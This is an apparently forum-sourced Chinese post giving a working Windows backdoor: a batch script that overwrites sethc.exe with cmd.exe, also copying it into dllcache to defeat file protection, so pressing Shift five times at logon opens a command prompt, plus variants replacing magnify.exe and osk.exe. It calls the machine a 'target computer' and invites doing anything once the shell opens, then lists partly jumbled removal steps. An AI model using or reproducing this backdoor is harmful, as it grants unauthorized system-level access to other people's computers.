制作方法:
复制内容到剪贴板代码:
@echo off
color 0a
copy %windir%\system32\cmd.exe %windir%\system32\sethc.exe /y
::下面是修改保护文件里面的。以防止弹出提示
copy %windir%\system32\sethc.exe %windir%\system32\dllcache\sethc.exe /y
exit
呵呵。。挺简单的一个后门
我自己留着。以防密码忘记时候。很有用。。还有2个可以作后门的。
用法:
如果目标计算机被安装了这个后门。只要你登陆计算机的时候。狂按5次 shift 键盘 ,就可以弹出命令行了。
有了命令行。你想干啥就干啥咯。。。
还有个是 Win+U 键组合。也可以作后门,代码如下
复制内容到剪贴板代码:
copy %system32%\cmd.exe %system32%\magnify.exe /y
::**********************************************************************
copy %system32%\cmd.exe %system32%\osk.exe /
清除方法:
1 打开 控制面板 辅助功能选项 键盘设置上面的第一个 使用快捷键(U) 取消掉 再按就没用了
2 直接找到 c:\windows\system32\dllcache\sethc.exe
c:\windows\system32\sethc.exe
3.如果删除不了,就先把注册表的 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
这项先删除了,再进行以上操作
先替换上面那个 再替换下面这个
3 直接把 c:\windows\system32\sethc.exe 所有权限都取消掉 不给读 运行 修改删除